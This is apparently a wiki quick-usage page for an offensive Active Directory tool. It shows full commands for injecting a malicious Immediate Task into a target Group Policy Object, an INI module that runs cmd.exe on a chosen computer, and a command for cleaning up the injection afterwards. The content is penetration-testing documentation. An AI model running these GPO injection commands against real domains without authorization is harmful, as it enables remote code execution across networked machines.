-
Notifications
You must be signed in to change notification settings - Fork 32
02_Quick Usage
If you are in a rush, chances are that you simply want to exploit a GPO by injecting a malicious configuration into it.
Here is an example of a gpo > inject command that adds an Immediate Task to your target GPO:
$ python3 gpb.py gpo inject --domain 'corp.com' --dc 'ad01-dc.corp.com' -k --module modules_templates/ImmediateTask_create.ini --gpo-name 'TARGET_GPO'The injected Immediate Task is described by the ImmediateTask_create.ini INI file, in which you provide its options. Several examples are provided in the modules_templates folder. If you want your Immediate Task to execute a cmd.exe command, and to only be deployed on the ad01-srv.corp.com computer:
[MODULECONFIG]
name = Scheduled Tasks
type = computer
[MODULEOPTIONS]
task_type = immediate
program = cmd.exe
arguments = /c "whoami > C:\Temp\poc.txt"
[MODULEFILTERS]
filters =
[{
"operator": "AND",
"type": "Computer Name",
"value": "ad01-srv1.corp.com"
}]
Once you are finished (e.g. your Immediate Task was executed by the target), you may remove the injected configuration from the GPO by running the gpo > clean command, which takes the state_folder generated by the previous gpo > inject command.
$ python3 gpb.py gpo clean --domain 'corp.com' --dc 'ad01-dc.corp.com' -k --state-folder 'state_folders/2025_07_15_075047'
For more complex exploitation scenarios and more details regarding the commands available to you, we encourage you to refer to the Usage section. For more information regarding modules, available configurations for each of them, and filters options, see the Modules and Modules configurations sections.